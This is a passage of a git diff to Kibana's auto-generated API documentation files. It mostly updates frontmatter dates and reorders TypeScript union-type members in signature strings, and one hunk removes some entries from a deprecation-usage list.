'@kbn/shared-ux-card-no-data-mocks'] --- import kbnSharedUxCardNoDataMocksObj from './kbn_shared_ux_card_no_data_mocks.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_components.devdocs.json b/api_docs/kbn_shared_ux_components.devdocs.json index 48342694fc62e..52bb9bcd5d8b0 100644 --- a/api_docs/kbn_shared_ux_components.devdocs.json +++ b/api_docs/kbn_shared_ux_components.devdocs.json @@ -221,7 +221,7 @@ "signature": [ "Omit<", "EuiPageProps", - ", \"paddingSize\"> & { template?: \"default\" | \"empty\" | \"centeredBody\" | \"centeredContent\" | undefined; paddingSize?: \"none\" | \"s\" | \"m\" | \"l\" | undefined; pageSideBar?: React.ReactNode; pageSideBarProps?: ", + ", \"paddingSize\"> & { template?: \"default\" | \"empty\" | \"centeredBody\" | \"centeredContent\" | undefined; paddingSize?: \"none\" | \"m\" | \"s\" | \"l\" | undefined; pageSideBar?: React.ReactNode; pageSideBarProps?: ", "EuiPageSideBarProps", " | undefined; pageHeader?: ", "EuiPageHeaderProps", diff --git a/api_docs/kbn_shared_ux_components.mdx b/api_docs/kbn_shared_ux_components.mdx index faa7e58949c5c..b98c4847a61f9 100644 --- a/api_docs/kbn_shared_ux_components.mdx +++ b/api_docs/kbn_shared_ux_components.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-components title: "@kbn/shared-ux-components" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-components plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-components'] --- import kbnSharedUxComponentsObj from './kbn_shared_ux_components.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_link_redirect_app_mocks.mdx b/api_docs/kbn_shared_ux_link_redirect_app_mocks.mdx index 58460783d5ceb..9a97cb66c3dfd 100644 --- a/api_docs/kbn_shared_ux_link_redirect_app_mocks.mdx +++ b/api_docs/kbn_shared_ux_link_redirect_app_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-link-redirect-app-mocks title: "@kbn/shared-ux-link-redirect-app-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-link-redirect-app-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-link-redirect-app-mocks'] --- import kbnSharedUxLinkRedirectAppMocksObj from './kbn_shared_ux_link_redirect_app_mocks.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_page_analytics_no_data.mdx b/api_docs/kbn_shared_ux_page_analytics_no_data.mdx index 9ade00f1687bc..760cecf99f62f 100644 --- a/api_docs/kbn_shared_ux_page_analytics_no_data.mdx +++ b/api_docs/kbn_shared_ux_page_analytics_no_data.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-page-analytics-no-data title: "@kbn/shared-ux-page-analytics-no-data" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-page-analytics-no-data plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-page-analytics-no-data'] --- import kbnSharedUxPageAnalyticsNoDataObj from './kbn_shared_ux_page_analytics_no_data.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_page_analytics_no_data_mocks.mdx b/api_docs/kbn_shared_ux_page_analytics_no_data_mocks.mdx index 79a5cf701f612..9afae8214cfcb 100644 --- a/api_docs/kbn_shared_ux_page_analytics_no_data_mocks.mdx +++ b/api_docs/kbn_shared_ux_page_analytics_no_data_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-page-analytics-no-data-mocks title: "@kbn/shared-ux-page-analytics-no-data-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-page-analytics-no-data-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-page-analytics-no-data-mocks'] --- import kbnSharedUxPageAnalyticsNoDataMocksObj from './kbn_shared_ux_page_analytics_no_data_mocks.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_page_kibana_no_data.mdx b/api_docs/kbn_shared_ux_page_kibana_no_data.mdx index 322be802d6c08..1a3a3c7c89877 100644 --- a/api_docs/kbn_shared_ux_page_kibana_no_data.mdx +++ b/api_docs/kbn_shared_ux_page_kibana_no_data.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-page-kibana-no-data title: "@kbn/shared-ux-page-kibana-no-data" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-page-kibana-no-data plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-page-kibana-no-data'] --- import kbnSharedUxPageKibanaNoDataObj from './kbn_shared_ux_page_kibana_no_data.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_page_kibana_no_data_mocks.mdx b/api_docs/kbn_shared_ux_page_kibana_no_data_mocks.mdx index a512afe961836..c316e7b9d753b 100644 --- a/api_docs/kbn_shared_ux_page_kibana_no_data_mocks.mdx +++ b/api_docs/kbn_shared_ux_page_kibana_no_data_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-page-kibana-no-data-mocks title: "@kbn/shared-ux-page-kibana-no-data-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-page-kibana-no-data-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-page-kibana-no-data-mocks'] --- import kbnSharedUxPageKibanaNoDataMocksObj from './kbn_shared_ux_page_kibana_no_data_mocks.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_page_solution_nav.mdx b/api_docs/kbn_shared_ux_page_solution_nav.mdx index 556c689971b16..41361fcc40286 100644 --- a/api_docs/kbn_shared_ux_page_solution_nav.mdx +++ b/api_docs/kbn_shared_ux_page_solution_nav.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-page-solution-nav title: "@kbn/shared-ux-page-solution-nav" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-page-solution-nav plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-page-solution-nav'] --- import kbnSharedUxPageSolutionNavObj from './kbn_shared_ux_page_solution_nav.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_prompt_no_data_views.devdocs.json b/api_docs/kbn_shared_ux_prompt_no_data_views.devdocs.json index 95f98f1e1bdb8..2a8c4dc5623ba 100644 --- a/api_docs/kbn_shared_ux_prompt_no_data_views.devdocs.json +++ b/api_docs/kbn_shared_ux_prompt_no_data_views.devdocs.json @@ -229,7 +229,7 @@ "The background color of the prompt; defaults to `plain`." ], "signature": [ - "\"primary\" | \"success\" | \"accent\" | \"warning\" | \"danger\" | \"subdued\" | \"transparent\" | \"plain\" | undefined" + "\"warning\" | \"subdued\" | \"primary\" | \"accent\" | \"success\" | \"danger\" | \"transparent\" | \"plain\" | undefined" ], "path": "node_modules/@kbn/shared-ux-prompt-no-data-views-types/index.d.ts", "deprecated": false diff --git a/api_docs/kbn_shared_ux_prompt_no_data_views.mdx b/api_docs/kbn_shared_ux_prompt_no_data_views.mdx index c3d677ceca3b8..c808c5622a8ed 100644 --- a/api_docs/kbn_shared_ux_prompt_no_data_views.mdx +++ b/api_docs/kbn_shared_ux_prompt_no_data_views.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-prompt-no-data-views title: "@kbn/shared-ux-prompt-no-data-views" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-prompt-no-data-views plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-prompt-no-data-views'] --- import kbnSharedUxPromptNoDataViewsObj from './kbn_shared_ux_prompt_no_data_views.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_prompt_no_data_views_mocks.mdx b/api_docs/kbn_shared_ux_prompt_no_data_views_mocks.mdx index ede900e41da16..7d07e9de1ed81 100644 --- a/api_docs/kbn_shared_ux_prompt_no_data_views_mocks.mdx +++ b/api_docs/kbn_shared_ux_prompt_no_data_views_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-prompt-no-data-views-mocks title: "@kbn/shared-ux-prompt-no-data-views-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-prompt-no-data-views-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-prompt-no-data-views-mocks'] --- import kbnSharedUxPromptNoDataViewsMocksObj from './kbn_shared_ux_prompt_no_data_views_mocks.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_services.mdx b/api_docs/kbn_shared_ux_services.mdx index b230b11db2a3f..2a20804cdf191 100644 --- a/api_docs/kbn_shared_ux_services.mdx +++ b/api_docs/kbn_shared_ux_services.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-services title: "@kbn/shared-ux-services" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-services plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-services'] --- import kbnSharedUxServicesObj from './kbn_shared_ux_services.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_storybook.mdx b/api_docs/kbn_shared_ux_storybook.mdx index 14a7f2b94f319..87f77aff15cd6 100644 --- a/api_docs/kbn_shared_ux_storybook.mdx +++ b/api_docs/kbn_shared_ux_storybook.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-storybook title: "@kbn/shared-ux-storybook" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-storybook plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-storybook'] --- import kbnSharedUxStorybookObj from './kbn_shared_ux_storybook.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_storybook_mock.mdx b/api_docs/kbn_shared_ux_storybook_mock.mdx index 1e6a8f1caa76f..c52de3158ef53 100644 --- a/api_docs/kbn_shared_ux_storybook_mock.mdx +++ b/api_docs/kbn_shared_ux_storybook_mock.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-storybook-mock title: "@kbn/shared-ux-storybook-mock" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-storybook-mock plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-storybook-mock'] --- import kbnSharedUxStorybookMockObj from './kbn_shared_ux_storybook_mock.devdocs.json'; diff --git a/api_docs/kbn_shared_ux_utility.mdx b/api_docs/kbn_shared_ux_utility.mdx index d6685ef3673d3..eb6d461c74a9e 100644 --- a/api_docs/kbn_shared_ux_utility.mdx +++ b/api_docs/kbn_shared_ux_utility.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-shared-ux-utility title: "@kbn/shared-ux-utility" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/shared-ux-utility plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/shared-ux-utility'] --- import kbnSharedUxUtilityObj from './kbn_shared_ux_utility.devdocs.json'; diff --git a/api_docs/kbn_some_dev_log.mdx b/api_docs/kbn_some_dev_log.mdx index 6e5d0f7977e6d..fb074811f062d 100644 --- a/api_docs/kbn_some_dev_log.mdx +++ b/api_docs/kbn_some_dev_log.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-some-dev-log title: "@kbn/some-dev-log" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/some-dev-log plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/some-dev-log'] --- import kbnSomeDevLogObj from './kbn_some_dev_log.devdocs.json'; diff --git a/api_docs/kbn_sort_package_json.mdx b/api_docs/kbn_sort_package_json.mdx index 82d54ae5eadd2..274025b5e3e3d 100644 --- a/api_docs/kbn_sort_package_json.mdx +++ b/api_docs/kbn_sort_package_json.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-sort-package-json title: "@kbn/sort-package-json" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/sort-package-json plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/sort-package-json'] --- import kbnSortPackageJsonObj from './kbn_sort_package_json.devdocs.json'; diff --git a/api_docs/kbn_std.mdx b/api_docs/kbn_std.mdx index d5a8163579ff7..5b1a4e4e890ad 100644 --- a/api_docs/kbn_std.mdx +++ b/api_docs/kbn_std.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-std title: "@kbn/std" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/std plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/std'] --- import kbnStdObj from './kbn_std.devdocs.json'; diff --git a/api_docs/kbn_stdio_dev_helpers.mdx b/api_docs/kbn_stdio_dev_helpers.mdx index a5f2611815a14..382c256e5e024 100644 --- a/api_docs/kbn_stdio_dev_helpers.mdx +++ b/api_docs/kbn_stdio_dev_helpers.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-stdio-dev-helpers title: "@kbn/stdio-dev-helpers" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/stdio-dev-helpers plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/stdio-dev-helpers'] --- import kbnStdioDevHelpersObj from './kbn_stdio_dev_helpers.devdocs.json'; diff --git a/api_docs/kbn_storybook.mdx b/api_docs/kbn_storybook.mdx index fda6332743a40..3f65c4d851ae2 100644 --- a/api_docs/kbn_storybook.mdx +++ b/api_docs/kbn_storybook.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-storybook title: "@kbn/storybook" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/storybook plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/storybook'] --- import kbnStorybookObj from './kbn_storybook.devdocs.json'; diff --git a/api_docs/kbn_telemetry_tools.mdx b/api_docs/kbn_telemetry_tools.mdx index 5d3d664479058..ef83560e77c81 100644 --- a/api_docs/kbn_telemetry_tools.mdx +++ b/api_docs/kbn_telemetry_tools.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-telemetry-tools title: "@kbn/telemetry-tools" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/telemetry-tools plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/telemetry-tools'] --- import kbnTelemetryToolsObj from './kbn_telemetry_tools.devdocs.json'; diff --git a/api_docs/kbn_test.mdx b/api_docs/kbn_test.mdx index 9d76da705e6e3..5ef8c29d8affa 100644 --- a/api_docs/kbn_test.mdx +++ b/api_docs/kbn_test.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-test title: "@kbn/test" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/test plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/test'] --- import kbnTestObj from './kbn_test.devdocs.json'; diff --git a/api_docs/kbn_test_jest_helpers.mdx b/api_docs/kbn_test_jest_helpers.mdx index 966d93e31a543..884bb77c0580b 100644 --- a/api_docs/kbn_test_jest_helpers.mdx +++ b/api_docs/kbn_test_jest_helpers.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-test-jest-helpers title: "@kbn/test-jest-helpers" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/test-jest-helpers plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/test-jest-helpers'] --- import kbnTestJestHelpersObj from './kbn_test_jest_helpers.devdocs.json'; diff --git a/api_docs/kbn_tooling_log.devdocs.json b/api_docs/kbn_tooling_log.devdocs.json index 3ead6f8896f56..063dd3e389106 100644 --- a/api_docs/kbn_tooling_log.devdocs.json +++ b/api_docs/kbn_tooling_log.devdocs.json @@ -558,7 +558,7 @@ "label": "level", "description": [], "signature": [ - "\"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"" + "\"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"" ], "path": "packages/kbn-tooling-log/src/tooling_log_collecting_writer.ts", "deprecated": false, @@ -651,7 +651,7 @@ "label": "level", "description": [], "signature": [ - "{ name: \"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"; flags: { error: boolean; success: boolean; warning: boolean; info: boolean; debug: boolean; silent: boolean; verbose: boolean; }; }" + "{ name: \"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"; flags: { error: boolean; warning: boolean; success: boolean; info: boolean; debug: boolean; silent: boolean; verbose: boolean; }; }" ], "path": "packages/kbn-tooling-log/src/tooling_log_text_writer.ts", "deprecated": false @@ -865,7 +865,7 @@ "label": "parseLogLevel", "description": [], "signature": [ - "(name: \"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\") => { name: \"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"; flags: { error: boolean; success: boolean; warning: boolean; info: boolean; debug: boolean; silent: boolean; verbose: boolean; }; }" + "(name: \"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\") => { name: \"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"; flags: { error: boolean; warning: boolean; success: boolean; info: boolean; debug: boolean; silent: boolean; verbose: boolean; }; }" ], "path": "packages/kbn-tooling-log/src/log_levels.ts", "deprecated": false, @@ -878,7 +878,7 @@ "label": "name", "description": [], "signature": [ - "\"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"" + "\"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"" ], "path": "packages/kbn-tooling-log/src/log_levels.ts", "deprecated": false, @@ -896,7 +896,7 @@ "label": "pickLevelFromFlags", "description": [], "signature": [ - "(flags: Record, options: { default?: \"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\" | undefined; }) => \"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"" + "(flags: Record, options: { default?: \"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\" | undefined; }) => \"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"" ], "path": "packages/kbn-tooling-log/src/log_levels.ts", "deprecated": false, @@ -933,7 +933,7 @@ "label": "default", "description": [], "signature": [ - "\"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\" | undefined" + "\"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\" | undefined" ], "path": "packages/kbn-tooling-log/src/log_levels.ts", "deprecated": false @@ -968,7 +968,7 @@ "level/type of message" ], "signature": [ - "\"error\" | \"success\" | \"warning\" | \"write\" | \"info\" | \"debug\" | \"verbose\"" + "\"error\" | \"warning\" | \"success\" | \"write\" | \"info\" | \"debug\" | \"verbose\"" ], "path": "packages/kbn-tooling-log/src/message.ts", "deprecated": false @@ -1088,7 +1088,7 @@ "\nLog level, messages below this level will be ignored" ], "signature": [ - "\"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"" + "\"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"" ], "path": "packages/kbn-tooling-log/src/tooling_log_text_writer.ts", "deprecated": false @@ -1228,7 +1228,7 @@ "label": "LogLevel", "description": [], "signature": [ - "\"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"" + "\"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"" ], "path": "packages/kbn-tooling-log/src/log_levels.ts", "deprecated": false, @@ -1242,7 +1242,7 @@ "label": "ParsedLogLevel", "description": [], "signature": [ - "{ name: \"error\" | \"success\" | \"warning\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"; flags: { error: boolean; success: boolean; warning: boolean; info: boolean; debug: boolean; silent: boolean; verbose: boolean; }; }" + "{ name: \"error\" | \"warning\" | \"success\" | \"info\" | \"debug\" | \"silent\" | \"verbose\"; flags: { error: boolean; warning: boolean; success: boolean; info: boolean; debug: boolean; silent: boolean; verbose: boolean; }; }" ], "path": "packages/kbn-tooling-log/src/log_levels.ts", "deprecated": false, diff --git a/api_docs/kbn_tooling_log.mdx b/api_docs/kbn_tooling_log.mdx index 12a78a81362d2..78ef107edb774 100644 --- a/api_docs/kbn_tooling_log.mdx +++ b/api_docs/kbn_tooling_log.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-tooling-log title: "@kbn/tooling-log" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/tooling-log plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/tooling-log'] --- import kbnToolingLogObj from './kbn_tooling_log.devdocs.json'; diff --git a/api_docs/kbn_type_summarizer.mdx b/api_docs/kbn_type_summarizer.mdx index be0253bede2db..7e332d5da7689 100644 --- a/api_docs/kbn_type_summarizer.mdx +++ b/api_docs/kbn_type_summarizer.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-type-summarizer title: "@kbn/type-summarizer" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/type-summarizer plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/type-summarizer'] --- import kbnTypeSummarizerObj from './kbn_type_summarizer.devdocs.json'; diff --git a/api_docs/kbn_type_summarizer_core.mdx b/api_docs/kbn_type_summarizer_core.mdx index f49ff71456fa4..74df26f8d9add 100644 --- a/api_docs/kbn_type_summarizer_core.mdx +++ b/api_docs/kbn_type_summarizer_core.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-type-summarizer-core title: "@kbn/type-summarizer-core" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/type-summarizer-core plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/type-summarizer-core'] --- import kbnTypeSummarizerCoreObj from './kbn_type_summarizer_core.devdocs.json'; diff --git a/api_docs/kbn_typed_react_router_config.mdx b/api_docs/kbn_typed_react_router_config.mdx index 496004802bc86..451e189b0fc16 100644 --- a/api_docs/kbn_typed_react_router_config.mdx +++ b/api_docs/kbn_typed_react_router_config.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-typed-react-router-config title: "@kbn/typed-react-router-config" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/typed-react-router-config plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/typed-react-router-config'] --- import kbnTypedReactRouterConfigObj from './kbn_typed_react_router_config.devdocs.json'; diff --git a/api_docs/kbn_ui_theme.mdx b/api_docs/kbn_ui_theme.mdx index 796ef0d53687f..832bc8a26b0df 100644 --- a/api_docs/kbn_ui_theme.mdx +++ b/api_docs/kbn_ui_theme.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-ui-theme title: "@kbn/ui-theme" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/ui-theme plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/ui-theme'] --- import kbnUiThemeObj from './kbn_ui_theme.devdocs.json'; diff --git a/api_docs/kbn_user_profile_components.devdocs.json b/api_docs/kbn_user_profile_components.devdocs.json index ee6fa83b35cdf..5ef1677f7275b 100644 --- a/api_docs/kbn_user_profile_components.devdocs.json +++ b/api_docs/kbn_user_profile_components.devdocs.json @@ -187,7 +187,7 @@ }, " extends Omit<", "EuiAvatarProps", - ", \"type\" | \"color\" | \"name\" | \"iconColor\" | \"iconType\" | \"iconSize\" | \"initials\" | \"initialsLength\" | \"imageUrl\">" + ", \"type\" | \"color\" | \"iconColor\" | \"name\" | \"iconType\" | \"iconSize\" | \"initials\" | \"initialsLength\" | \"imageUrl\">" ], "path": "packages/kbn-user-profile-components/src/user_avatar.tsx", "deprecated": false, diff --git a/api_docs/kbn_user_profile_components.mdx b/api_docs/kbn_user_profile_components.mdx index 6261432bfc020..08dc739f77a14 100644 --- a/api_docs/kbn_user_profile_components.mdx +++ b/api_docs/kbn_user_profile_components.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-user-profile-components title: "@kbn/user-profile-components" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/user-profile-components plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/user-profile-components'] --- import kbnUserProfileComponentsObj from './kbn_user_profile_components.devdocs.json'; diff --git a/api_docs/kbn_utility_types.mdx b/api_docs/kbn_utility_types.mdx index 2b1eb35f16ff6..88696704bddb7 100644 --- a/api_docs/kbn_utility_types.mdx +++ b/api_docs/kbn_utility_types.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-utility-types title: "@kbn/utility-types" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/utility-types plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/utility-types'] --- import kbnUtilityTypesObj from './kbn_utility_types.devdocs.json'; diff --git a/api_docs/kbn_utility_types_jest.mdx b/api_docs/kbn_utility_types_jest.mdx index c3de040d1aef6..b564685326479 100644 --- a/api_docs/kbn_utility_types_jest.mdx +++ b/api_docs/kbn_utility_types_jest.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-utility-types-jest title: "@kbn/utility-types-jest" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/utility-types-jest plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/utility-types-jest'] --- import kbnUtilityTypesJestObj from './kbn_utility_types_jest.devdocs.json'; diff --git a/api_docs/kbn_utils.mdx b/api_docs/kbn_utils.mdx index 6400d3ce77063..906b61b007483 100644 --- a/api_docs/kbn_utils.mdx +++ b/api_docs/kbn_utils.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-utils title: "@kbn/utils" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/utils plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/utils'] --- import kbnUtilsObj from './kbn_utils.devdocs.json'; diff --git a/api_docs/kbn_yarn_lock_validator.mdx b/api_docs/kbn_yarn_lock_validator.mdx index 183df3e3c8eb4..d9202415378fe 100644 --- a/api_docs/kbn_yarn_lock_validator.mdx +++ b/api_docs/kbn_yarn_lock_validator.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-yarn-lock-validator title: "@kbn/yarn-lock-validator" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/yarn-lock-validator plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/yarn-lock-validator'] --- import kbnYarnLockValidatorObj from './kbn_yarn_lock_validator.devdocs.json'; diff --git a/api_docs/kibana_overview.mdx b/api_docs/kibana_overview.mdx index e65cbc7e6959d..a66ba46c615b8 100644 --- a/api_docs/kibana_overview.mdx +++ b/api_docs/kibana_overview.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kibanaOverview title: "kibanaOverview" image: https://source.unsplash.com/400x175/?github description: API docs for the kibanaOverview plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', 'kibanaOverview'] --- import kibanaOverviewObj from './kibana_overview.devdocs.json'; diff --git a/api_docs/kibana_react.devdocs.json b/api_docs/kibana_react.devdocs.json index 220e36cce7cf0..986f60b1bff13 100644 --- a/api_docs/kibana_react.devdocs.json +++ b/api_docs/kibana_react.devdocs.json @@ -1820,30 +1820,6 @@ "plugin": "fleet", "path": "x-pack/plugins/fleet/public/components/custom_assets_accordion.tsx" }, - { - "plugin": "visualizations", - "path": "src/plugins/visualizations/public/visualize_app/utils/get_table_columns.tsx" - }, - { - "plugin": "visualizations", - "path": "src/plugins/visualizations/public/visualize_app/utils/get_table_columns.tsx" - }, - { - "plugin": "visualizations", - "path": "src/plugins/visualizations/public/visualize_app/utils/get_table_columns.tsx" - }, - { - "plugin": "lens", - "path": "x-pack/plugins/lens/public/editor_frame_service/editor_frame/workspace_panel/workspace_panel.tsx" - }, - { - "plugin": 